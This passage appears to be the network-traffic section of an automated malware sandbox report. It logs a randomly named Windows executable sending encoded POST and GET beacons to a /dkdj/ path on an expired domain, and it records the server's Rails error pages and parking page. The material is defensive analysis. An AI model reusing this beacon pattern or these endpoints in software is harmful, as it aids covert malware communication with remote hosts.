                                Data Raw: 6a 54 5a 50 70 3d 5a 30 6b 37 4c 30 49 6f 47 63 69 72 39 4f 2b 46 46 65 65 4b 38 64 6a 36 47 6f 6e 34 72 76 4d 6d 4b 72 7a 63 71 38 71 66 58 6b 46 76 52 36 68 39 67 4f 65 79 48 57 53 58 41 70 67 6e 65 49 49 4e 6f 4d 61 4b 33 75 37 4c 72 78 4d 55 77 67 31 50 6f 48 34 44 64 63 6b 2b 42 63 59 6d 68 52 48 65 4f 61 55 62 48 49 5a 72 64 52 4c 30 50 57 58 54 39 36 64 6e 39 30 46 63 61 6e 78 54 4f 44 33 72 76 57 69 62 4c 4f 39 52 2f 4c 42 49 44 62 34 4a 6c 33 4b 37 33 6b 34 4b 4c 50 54 38 51 45 75 36 72 2f 6f 53 32 68 61 73 6e 63 61 6a 2f 4e 30 35 4c 48 43 30 56 4d 57 4e 78 52 4f 52 30 7a 2b 79 76 6a 34 30 6c 55 71 71 2b 43 6c 34 76 4d 55 58 6f 76 4d 56 69 32 46 55 2f 50 6e 64 76 39 49 38 73 41 3d 3d
                                Data Ascii: jTZPp=Z0k7L0IoGcir9O+FFeeK8dj6Gon4rvMmKrzcq8qfXkFvR6h9gOeyHWSXApgneIINoMaK3u7LrxMUwg1PoH4Ddck+BcYmhRHeOaUbHIZrdRL0PWXT96dn90FcanxTOD3rvWibLO9R/LBIDb4Jl3K73k4KLPT8QEu6r/oS2hasncaj/N05LHC0VMWNxROR0z+yvj40lUqq+Cl4vMUXovMVi2FU/Pndv9I8sA==
                                May 28, 2024 07:17:09.847301960 CEST1236INHTTP/1.1 404 Not Found
                                content-type: text/html; charset=UTF-8
                                x-request-id: 238e2ff7-599a-4fd4-bb3d-a9cf08aa8df5
                                x-runtime: 0.056269
                                content-length: 18278
                                connection: close
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                May 28, 2024 07:17:09.847424030 CEST1236INData Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a
                                Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
                                May 28, 2024 07:17:09.847434998 CEST1236INData Raw: 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c
                                Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
                                May 28, 2024 07:17:09.847445965 CEST672INData Raw: 0a 20 20 20 20 76 61 72 20 74 6f 67 67 6c 65 53 65 73 73 69 6f 6e 44 75 6d 70 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 6f 67 67 6c 65 28 27 73 65 73 73 69 6f 6e 5f 64 75 6d 70 27 29 3b 0a 20 20 20
                                Data Ascii: var toggleSessionDump = function() { return toggle('session_dump'); } var toggleEnvDump = function() { return toggle('env_dump'); } </script></head><body><header> <h1>Routing Error</h1></header><div id="c
                                May 28, 2024 07:17:09.847455025 CEST1236INData Raw: 61 6d 65 77 6f 72 6b 20 54 72 61 63 65 3c 2f 61 3e 20 7c 0a 20 20 20 20 3c 61 20 68 72 65 66 3d 22 23 22 20 6f 6e 63 6c 69 63 6b 3d 22 68 69 64 65 28 26 23 33 39 3b 41 70 70 6c 69 63 61 74 69 6f 6e 2d 54 72 61 63 65 26 23 33 39 3b 29 3b 68 69 64
                                Data Ascii: amework Trace</a> | <a href="#" onclick="hide(&#39;Application-Trace&#39;);hide(&#39;Framework-Trace&#39;);show(&#39;Full-Trace&#39;);; return false;">Full Trace</a> <div id="Application-Trace" style="display: block;"> <pre><co
                                May 28, 2024 07:17:09.847465992 CEST1236INData Raw: 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 76 65 5f 73 75 70 70 6f 72 74 2f 74 61 67 67 65 64 5f 6c 6f 67 67 69 6e 67 2e 72 62 3a 37 31 3a 69 6e 20 60 74 61 67 67 65 64 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74
                                Data Ascii: (5.2.6) lib/active_support/tagged_logging.rb:71:in `tagged&#39;</a><br><a class="trace-frames" data-frame-id="7" href="#">railties (5.2.6) lib/rails/rack/logger.rb:26:in `call&#39;</a><br><a class="trace-frames" data-frame-id="8" href="#">acti
                                May 28, 2024 07:17:09.847553968 CEST1236INData Raw: 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 36 22 20 68 72 65 66 3d 22 23 22 3e 72 61 63 6b 20 28 32 2e 32 2e 33 29
                                Data Ascii: `call&#39;</a><br><a class="trace-frames" data-frame-id="16" href="#">rack (2.2.3) lib/rack/sendfile.rb:110:in `call&#39;</a><br><a class="trace-frames" data-frame-id="17" href="#">railties (5.2.6) lib/rails/user.rb:524:in `call&#39;</a><br>
                                May 28, 2024 07:17:09.847567081 CEST1236INData Raw: 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 32 22 20 68 72 65 66 3d 22 23 22 3e 6c 6f 67 72 61 67 65 20 28 30 2e 31 31 2e 32 29 20 6c 69 62 2f 6c 6f 67 72 61 67 65 2f 72 61 69 6c 73 5f 65 78 74 2f 72 61 63
                                Data Ascii: race-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app&#39;</a><br><a class="trace-frames" data-frame-id="3" href="#">railties (5.2.6) lib/rails/rack/logger.rb:26:in `block in call&#39;</a
                                May 28, 2024 07:17:09.847578049 CEST1236INData Raw: 3d 22 23 22 3e 72 61 63 6b 20 28 32 2e 32 2e 33 29 20 6c 69 62 2f 72 61 63 6b 2f 6d 65 74 68 6f 64 5f 6f 76 65 72 72 69 64 65 2e 72 62 3a 32 34 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72
                                Data Ascii: ="#">rack (2.2.3) lib/rack/method_override.rb:24:in `call&#39;</a><br><a class="trace-frames" data-frame-id="12" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `call&#39;</a><br><a class="trace-frames" data-frame-id="13" href="#">activesuppor
                                May 28, 2024 07:17:09.847744942 CEST1236INData Raw: 65 66 3d 22 23 22 3e 70 75 6d 61 20 28 34 2e 33 2e 39 29 20 6c 69 62 2f 70 75 6d 61 2f 73 65 72 76 65 72 2e 72 62 3a 33 32 38 3a 69 6e 20 60 62 6c 6f 63 6b 20 69 6e 20 72 75 6e 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22
                                Data Ascii: ef="#">puma (4.3.9) lib/puma/server.rb:328:in `block in run&#39;</a><br><a class="trace-frames" data-frame-id="22" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:in `block in spawn_thread&#39;</a><br></code></pre> </div> <script type
                                May 28, 2024 07:17:09.855135918 CEST1236INData Raw: 29 3b 0a 20 20 20 20 20 20 20 20 20 20 63 75 72 72 65 6e 74 53 6f 75 72 63 65 20 3d 20 65 6c 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 64 69 76 3e 0a 0a 0a 20 20 20 20
                                Data Ascii: ); currentSource = el; } } } </script></div> <h2> Routes </h2> <p> Routes match in priority from top to bottom </p> <table id='route_table' class='route_table'> <thead>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                27192.168.2.649739216.40.34.41801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:17:11.813875914 CEST1801OUTPOST /dkdj/ HTTP/1.1
                                Host: www.allgiftedmalaysia.com
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 1246
                                Origin: http://www.allgiftedmalaysia.com
                                Referer: http://www.allgiftedmalaysia.com/dkdj/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Raw: 6a 54 5a 50 70 3d 5a 30 6b 37 4c 30 49 6f 47 63 69 72 39 4f 2b 46 46 65 65 4b 38 64 6a 36 47 6f 6e 34 72 76 4d 6d 4b 72 7a 63 71 38 71 66 58 6b 4e 76 52 49 70 39 68 76 65 79 45 57 53 58 49 4a 67 69 65 49 49 41 6f 4d 44 44 33 75 48 68 72 33 49 55 77 44 4e 50 74 31 41 44 54 63 6b 2b 65 73 59 72 6c 52 48 48 4f 62 6b 66 48 49 4a 72 64 52 4c 30 50 55 2f 54 70 62 64 6e 37 30 46 66 4e 58 78 66 45 54 33 54 76 53 47 4c 4c 4f 70 42 2f 39 78 49 44 36 49 4a 6e 46 69 37 6f 30 34 4d 4b 50 53 70 51 45 69 66 72 2f 6c 72 32 68 65 43 6e 65 47 6a 75 37 39 4e 65 58 32 53 49 38 53 71 77 44 57 73 73 6b 65 4f 6f 79 63 7a 32 53 61 37 37 53 6f 56 75 59 41 52 6a 2f 35 77 6e 33 39 32 68 76 32 42 72 35 42 58 34 45 36 43 45 55 66 4a 43 62 67 30 74 48 6e 73 71 6d 43 4d 77 53 6a 54 67 63 79 47 36 71 53 35 37 6d 4b 71 70 39 59 41 45 6e 52 66 4f 4f 69 4f 76 33 58 76 53 4b 34 56 46 75 33 69 69 4e 65 7a 4f 37 31 30 4f 67 38 63 68 50 53 52 61 6d 39 62 74 2f 6b 63 46 36 6c 72 75 34 33 38 42 47 59 58 2f 77 39 4c 36 4d 78 46 49 44 45 35 [TRUNCATED]
                                Data Ascii: jTZPp=Z0k7L0IoGcir9O+FFeeK8dj6Gon4rvMmKrzcq8qfXkNvRIp9hveyEWSXIJgieIIAoMDD3uHhr3IUwDNPt1ADTck+esYrlRHHObkfHIJrdRL0PU/Tpbdn70FfNXxfET3TvSGLLOpB/9xID6IJnFi7o04MKPSpQEifr/lr2heCneGju79NeX2SI8SqwDWsskeOoycz2Sa77SoVuYARj/5wn392hv2Br5BX4E6CEUfJCbg0tHnsqmCMwSjTgcyG6qS57mKqp9YAEnRfOOiOv3XvSK4VFu3iiNezO710Og8chPSRam9bt/kcF6lru438BGYX/w9L6MxFIDE5czGHUUP1l2lIXSnunGGF/qJrSs8HUKh4cFebmhTDCF1SWKMLKqoUFD286+LZUZHpFJiobRIuKZyi03VvQQrKTu79seTQh0KfXxhvNvUdUf+uFLoC/KKkjRiLSGq3CHN5kCGQBsFVEKLk8KXfbP2JGK/VZQK0k8sM6HUzXazrhr237wxndqSRWcnYHzYv6WtLM7gz0WZTce4xMxqwOkdwDVz1MQhZo1Jd8WK9pUYiegOT98adRhtXyUtZTBB1dYU6KC432DpFCAP7iWaD3eTtLituK5X7b//aox8WqZwxKEqk+D3hKU3I9sYaaYUmZtiMEKVr4aAVhD5k/J1fUl7LvjqeLN7Z2L9FjbwONI1W2jiSdjChBTUD8PIGyHDaT/yc03IJbFOpSN01VhRB95KIpn6VzRHdu43wllN1dgHxnmc0HRdcCGCS7xnRyPiUwVAmAMtPicfzY+vNd5ksnffJpfxxyOBd+X2SSNOV0dswwJz3MxmcsJvU1252MplgwxHCHsS8yBljFa9FQJfzz8ue8F4hSfSu9hisdGPd5XCtQDQP74NN7IyLwZNootczZFak82YECR1xXfDrljmUPBjVtxicZGx2mPf4x2bhz7YUKtBkvMRZbMGqE6Irsu61EW3zK6PqoZcg9+6qYFwqZSuByQfWMGmLOuKtAn [TRUNCATED]
                                May 28, 2024 07:17:12.337214947 CEST1236INHTTP/1.1 404 Not Found
                                content-type: text/html; charset=UTF-8
                                x-request-id: a8a9b9cd-96f7-44b8-b236-0f9927f5c434
                                x-runtime: 0.033622
                                content-length: 19290
                                connection: close
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                May 28, 2024 07:17:12.337229013 CEST224INData Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a
                                Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source {
                                May 28, 2024 07:17:12.337244987 CEST1236INData Raw: 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 39 44 39 44 39 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 45 43 45 43 45 43 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20
                                Data Ascii: border: 1px solid #D9D9D9; background: #ECECEC; width: 978px; } .source pre { padding: 10px 0px; border: none; } .source .data { font-size: 80%; overflow: auto; background-colo
                                May 28, 2024 07:17:12.337259054 CEST1236INData Raw: 65 3a 20 74 65 78 74 66 69 65 6c 64 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 62 6f 64 79 20 74 72 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 64 64 3b 0a 20 20
                                Data Ascii: e: textfield; } #route_table tbody tr { border-bottom: 1px solid #ddd; } #route_table tbody tr:nth-child(odd) { background: #f2f2f2; } #route_table tbody.exact_matches, #route_table tbody.fuzzy_matches { background
                                May 28, 2024 07:17:12.337268114 CEST1236INData Raw: 2f 68 65 61 64 65 72 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 3c 68 32 3e 4e 6f 20 72 6f 75 74 65 20 6d 61 74 63 68 65 73 20 5b 50 4f 53 54 5d 20 26 71 75 6f 74 3b 2f 64 6b 64 6a 26 71 75 6f 74 3b 3c 2f 68 32 3e
                                Data Ascii: /header><div id="container"> <h2>No route matches [POST] &quot;/dkdj&quot;</h2> <p><code>Rails.root: /hover-parked</code></p><div id="traces"> <a href="#" onclick="hide(&#39;Framework-Trace&#39;);hide(&#39;Full-Trace&#39;);show(&#
                                May 28, 2024 07:17:12.337279081 CEST672INData Raw: 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 33 22 20 68 72 65 66 3d 22 23 22 3e 72 61 69 6c 74 69 65 73 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 72 61 69 6c 73 2f 72 61 63 6b 2f 6c 6f 67 67 65 72 2e 72 62 3a 32 36 3a 69 6e 20 60 62 6c 6f 63 6b 20
                                Data Ascii: data-frame-id="3" href="#">railties (5.2.6) lib/rails/rack/logger.rb:26:in `block in call&#39;</a><br><a class="trace-frames" data-frame-id="4" href="#">activesupport (5.2.6) lib/active_support/tagged_logging.rb:71:in `block in tagged&#39;</a>
                                May 28, 2024 07:17:12.337347031 CEST1236INData Raw: 64 3d 22 38 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 6f 6e 70 61 63 6b 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 72 65 6d 6f 74 65 5f 69 70 2e 72 62 3a 38 31 3a 69
                                Data Ascii: d="8" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/remote_ip.rb:81:in `call&#39;</a><br><a class="trace-frames" data-frame-id="9" href="#">request_store (1.5.0) lib/request_store/middleware.rb:19:in `call&#39;</a><br><a class="tr
                                May 28, 2024 07:17:12.337357998 CEST1236INData Raw: 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 38 22 20 68 72 65 66 3d 22 23 22 3e 70 75 6d 61 20 28 34 2e 33 2e 39
                                Data Ascii: `call&#39;</a><br><a class="trace-frames" data-frame-id="18" href="#">puma (4.3.9) lib/puma/configuration.rb:228:in `call&#39;</a><br><a class="trace-frames" data-frame-id="19" href="#">puma (4.3.9) lib/puma/server.rb:718:in `handle_request&#
                                May 28, 2024 07:17:12.337368011 CEST1236INData Raw: 6f 63 6b 20 69 6e 20 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 34 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 76 65 73
                                Data Ascii: ock in call&#39;</a><br><a class="trace-frames" data-frame-id="4" href="#">activesupport (5.2.6) lib/active_support/tagged_logging.rb:71:in `block in tagged&#39;</a><br><a class="trace-frames" data-frame-id="5" href="#">activesupport (5.2.6) l
                                May 28, 2024 07:17:12.337378979 CEST1236INData Raw: 65 66 3d 22 23 22 3e 61 63 74 69 76 65 73 75 70 70 6f 72 74 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 76 65 5f 73 75 70 70 6f 72 74 2f 63 61 63 68 65 2f 73 74 72 61 74 65 67 79 2f 6c 6f 63 61 6c 5f 63 61 63 68 65 5f 6d 69 64 64 6c 65 77
                                Data Ascii: ef="#">activesupport (5.2.6) lib/active_support/cache/strategy/local_cache_middleware.rb:29:in `call&#39;</a><br><a class="trace-frames" data-frame-id="14" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/executor.rb:14:in `call&#39;
                                May 28, 2024 07:17:12.342873096 CEST1236INData Raw: 69 76 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 76 61 72 20 74 72 61 63 65 46 72 61 6d 65 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42
                                Data Ascii: iv> <script type="text/javascript"> var traceFrames = document.getElementsByClassName('trace-frames'); var selectedFrame, currentSource = document.getElementById('frame-source-0'); // Add click listeners for all stack frames


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                28192.168.2.649740216.40.34.41801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:17:14.346158028 CEST485OUTGET /dkdj/?5L0=2bCPy0&jTZPp=U2MbIDwYObql7+StDszk2IWvOqKP49Y4LLLXxrmKfStKROUY/qK9Zw3EJYAbIJoej5+11dDiuiwrzCxekQQ2SsNjLcEghxbMGsQSE4hdcQPQTWeOxMh44mhCIwJzKEDB4Xq2erE= HTTP/1.1
                                Host: www.allgiftedmalaysia.com
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                May 28, 2024 07:17:14.853478909 CEST1236INHTTP/1.1 200 OK
                                x-frame-options: SAMEORIGIN
                                x-xss-protection: 1; mode=block
                                x-content-type-options: nosniff
                                x-download-options: noopen
                                x-permitted-cross-domain-policies: none
                                referrer-policy: strict-origin-when-cross-origin
                                content-type: text/html; charset=utf-8
                                etag: W/"5a28beb34987a526f17f1fe74b6858c2"
                                cache-control: max-age=0, private, must-revalidate
                                x-request-id: 72698272-5488-4c38-b5ea-e5baffcc96a6
                                x-runtime: 0.006749
                                transfer-encoding: chunked
                                connection: close
                                Data Raw: 31 37 46 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 33 43 62 61 56 76 77 2d 49 37 4d 6c 72 6d 6d 6d 48 7a 30 62 66 62 6b 6f 37 6f 4d 43 57 31 6d 6e 32 75 36 35 75 57 73 57 57 42 38 27 20 6e 61 6d 65 3d 27 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 27 20 6e 61 6d 65 3d 27 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 64 61 74 61 [TRUNCATED]
                                Data Ascii: 17F7<!DOCTYPE html><html><head><meta content='text/html; charset=UTF-8' http-equiv='Content-Type'><meta content='3CbaVvw-I7MlrmmmHz0bfbko7oMCW1mn2u65uWsWWB8' name='google-site-verification'><meta content='width=device-width, initial-scale=1.0' name='viewport'><meta content='telephone=no' name='format-detection'><link href='data:;base64,iVBORw0KGgo=' rel='icon'><title>allgiftedmalaysia.com is expired</title><link rel="stylesheet" media="screen" href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" /><link rel="stylesheet" media="all" href="/assets/application-2f7e7f30d812d0f3950918c7562df7e68eeeebd8649bdea2bc3844eb07fc8269.css" /></head><body><header><a rel="nofollow" href="https://www.hover.com/?source=
                                May 28, 2024 07:17:14.853496075 CEST1236INData Raw: 65 78 70 69 72 65 64 22 3e 3c 69 6d 67 20 77 69 64 74 68 3d 22 31 30 32 22 20 68 65 69 67 68 74 3d 22 33 30 22 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 68 76 5f 6c 6f 67 6f 5f 72 65 74 69 6e 61 2d 36 61 32 62 61 38 33 35 30 39 30 37 64 34 61 31
                                Data Ascii: expired"><img width="102" height="30" src="/assets/hv_logo_retina-6a2ba8350907d4a17bfc7863c2f1378e38a53bd22b790c69c14143b0f9ce45ca.png" /></a></header><main><h1>allgiftedmalaysia.com</h1><h2>has expired.</h2><div class='cta'><a class='bt
                                May 28, 2024 07:17:14.853507996 CEST1236INData Raw: 2e 63 6f 6d 2f 64 6f 6d 61 69 6e 5f 70 72 69 63 69 6e 67 3f 73 6f 75 72 63 65 3d 65 78 70 69 72 65 64 22 3e 44 6f 6d 61 69 6e 20 50 72 69 63 69 6e 67 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20
                                Data Ascii: .com/domain_pricing?source=expired">Domain Pricing</a></li><li><a rel="nofollow" href="https://www.hover.com/email?source=expired">Email</a></li><li><a rel="nofollow" href="https://www.hover.com/about?source=expired">About Us</a></li><li><a
